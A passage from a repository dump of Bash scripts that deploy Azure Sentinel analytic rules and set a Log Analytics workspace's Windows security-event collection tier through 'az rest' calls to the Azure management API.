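        echo ${row} | base64 -d | jq -r ${1} | az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/providers/Microsoft.SecurityInsights/alertRules/${name}?api-version=2019-01-01-preview" --body @- --verbose || return_code=$?
        # Handling error
        if [ "$return_code" != "0" ] && [ "$return_code" ]; then
            RED='\033[0;31m'
            NC='\033[0m'
            echo -e "${RED}[!] Creation of analytic rule failed.."
            echo ${row} | base64 -d | jq -Mr ${1}
            echo -e "${NC}"
        fi
        sleep 1
    done
fi
-------------------------------------------------------------------------------- /resources/scripts/Set-WinEventCollectionTier.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Author: Roberto Rodriguez (@Cyb3rWard0g) 4 | # License: GPL-3.0 5 | 6 | # Reference: 7 | # https://docs.microsoft.com/en-us/cli/azure/reference-index?view=azure-cli-latest#az-rest 8 | # https://github.com/Azure/Azure-Security-Center/tree/master/Powershell%20scripts/Security%20Event%20collection%20tier 9 | # https://medium.com/@mauridb/calling-azure-rest-api-via-curl-eb10a06127 10 | 11 | set -e 12 | 13 | script_name=$0 14 | 15 | usage(){ 16 | echo "Invalid option: -$OPTARG" 17 | echo "Usage: ${script_name} -r [Resource group name]" 18 | echo " -w [Log Analytics Workspace Name]" 19 | echo " -t [Security Events collection tier (None, Minimal, All)]" 20 | exit 1 21 | } 22 | 23 | 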
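while getopts :r:w:t:h opt; do
    # Leading ':' in the option string puts getopts in silent mode, so an option with a missing
    # argument (':') or an unknown option ('?') reaches usage instead of being printed and ignored.
    case "$opt" in
        r) RESOURCE_GROUP_NAME=$OPTARG;;
        w) WORKSPACE_NAME=$OPTARG;;
        t) COLLECTION_TIER=$OPTARG;;
        h) usage;;
        :) echo "Option -$OPTARG requires an argument" >&2; usage;;
        \?) usage;;
    esac
done

shift $((OPTIND-1))
[ "$1" = "--" ] && shift

if [ -z "$RESOURCE_GROUP_NAME" ] || [ -z "$WORKSPACE_NAME" ] || [ -z "$COLLECTION_TIER" ]; then
    usage
else
    # *********** Validating Collection Tier ***************
    # Only the three literal tier names may reach the request body below, which is built by string interpolation.
    case $COLLECTION_TIER in
        None) ;;
        Minimal) ;;
        All) ;;
        *)
            echo -e "\n[!!] Not a valid Windows security event collection tier. Allowed tiers: None, Minimal & All\n"
            usage
            ;;
    esac

    # Sets the Security Events collection tier of the workspace's SecurityInsights data source;
    # az rest resolves the literal {subscriptionId} token to the active account's subscription.
    az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/workspaces/${WORKSPACE_NAME}/datasources/SecurityInsightsSecurityEventCollectionConfiguration?api-version=2015-11-01-preview" --body "
    {
        \"kind\": \"SecurityInsightsSecurityEventCollectionConfiguration\",
        \"properties\": {
            \"Tier\": \"${COLLECTION_TIER}\",
            \"TierSetMethod\": \"Custom\"
        }
    }
    " --verbose
fi
# SecurityInsightsSecurityEventCollectionConfiguration
# az rest -m put -u "https://management.azure.com/subscriptions/{subscriptionId}/resourcegroups/${RESOURCE_GROUP_NAME}/providers/Microsoft.OperationalInsights/Workspaces/${WORKSPACE_NAME}/datasources/SecurityEventCollectionConfiguration?api-version=2015-11-01-preview" --body "
# SecurityEventCollectionConfiguration
--------------------------------------------------------------------------------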